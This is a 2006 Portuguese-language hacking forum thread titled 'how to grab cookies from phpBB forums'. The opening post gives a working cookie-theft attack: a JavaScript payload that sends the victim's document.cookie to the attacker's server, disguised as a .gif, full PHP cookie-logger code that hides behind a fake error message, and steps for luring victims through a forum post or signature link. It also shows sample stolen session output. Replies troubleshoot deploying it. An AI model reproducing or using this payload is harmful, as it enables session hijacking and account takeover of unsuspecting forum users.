FORUM DARKERS

Segurança & Hacking => Penetration Tests => Topic started by: _Dr4k0_ on 06 de August , 2006, 02:36:29 PM

Title: Como pegar o cookies simples dos foruns phpbb
Post by: _Dr4k0_ on 06 de August , 2006, 02:36:29 PM
Tradução de um texto em italiano, muito interessante.
Autor: Root

Primeiramente, é muito simples, basta seguir os passos;

1) Abra o bloco de notas e escreva: location.href='http://www.seusite.com/cookielogger.php?cookie='+escape(document.cookie)

e entre as tags <*SCRIPT*> sem asterisco.

2) Salva e renomeia como "sun.gif

Agora você deve criar um cookielogger, eu gosto deste:
?php $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } } echo "Temporary Server Error,Sorry for the inconvenience."; fclose($handle); exit; } echo "Temporary Server Error,Sorry for the inconvenience."; exit; ?>

Salve e renomeie cookielogger.php

3) Crie um novo documento e salve isso como logfile.txt

4) Procure na Internet por uma foto pequena, eu gosto desta:

(//http://img78.imageshack.us/img78/3898/images0nj1.jpg)

Agora...

Estas arquivos num server, por exemplo:

cookielogger.php -> www.seusite.com/cookielogger.php (http://www.seusite.com/cookielogger.php)
logfile.txt -> www.seusite.com/logfile.txt (http://www.seusite.com/logfile.txt) (chmod 777)
fun.gif -> www.seusite.com/fun.gif (http://www.seusite.com/fun.gif)

5) Vai a vitima no forum e insira este código na assinatura ou em um post ou quando você enviar um Smiley (olhe 'malicioso' code.)
[url*=http://www.seusiteCOMSUAFOTOMALICIOSA.com/fun.gif](//http://*http://seuSITE_OU_OUTRO_COM_A_IMAGEM_MINIATURA_BOA.com/fun.jpg*)*[/url]
PS: Sem os asteriscos -> *

Quando a vítima postar ela vai ver a foto:
(//http://img78.imageshack.us/img78/3898/images0nj1.jpg)

Mas quando ela clicar vai ter " Temporary Error ... "
E você:
"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9 "

Espero que tenham gostado.


Tradução by: Storm.
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: spiriti on 06 de August , 2006, 09:41:27 PM
Muito interessante,vou dar uma conferida e ver o que consigo!
Valeu!
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: DarkGenesis on 06 de August , 2006, 11:44:47 PM
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: Fvox on 09 de August , 2006, 03:15:08 PM
Olha cara, eu coloquei assim no forum phpBB que eu fiz de teste !

[url=http://www.meuhost.com/sun.gif]http://www.meuhost.com/sig.gif[/url]

Ai lá não apareceu a imagem, e sim apenas o link para o texto original (O nome do hyper link)

O que eu fiz de errado?  :(
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: Fvox on 09 de August , 2006, 03:21:37 PM
Não estou achando o botão editar  :)

Agora eu coloquei assim:
[url=http://www.meuhost.com/sun.gif][img]http://http://www.meuhost.com/sig.gif[/img][/url]
A imagem aparece como um X (erro ao caregar a imagem), e quando se clica vai para o arquivo sun.gif

O que estou fazendo de errado agora?
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: Magrinho Loko on 09 de August , 2006, 03:57:47 PM
Quote from: "Fvox"Não estou achando o botão editar  :)

Agora eu coloquei assim:
[url=http://www.meuhost.com/sun.gif][img]http://http://www.meuhost.com/sig.gif[/img][/url]
A imagem aparece como um X (erro ao caregar a imagem), e quando se clica vai para o arquivo sun.gif

O que estou fazendo de errado agora?

Tenta assim <a href="http://www.meuhost.com/sun.gif"><img="http://http://www.meuhost.com/sig.gif" /></a>
Title: Re: Como pegar o cookies simples dos foruns phpbb
Post by: Fvox on 10 de August , 2006, 12:51:29 PM
Não consegui tbm

HTML deve estar desabilitado nas postagens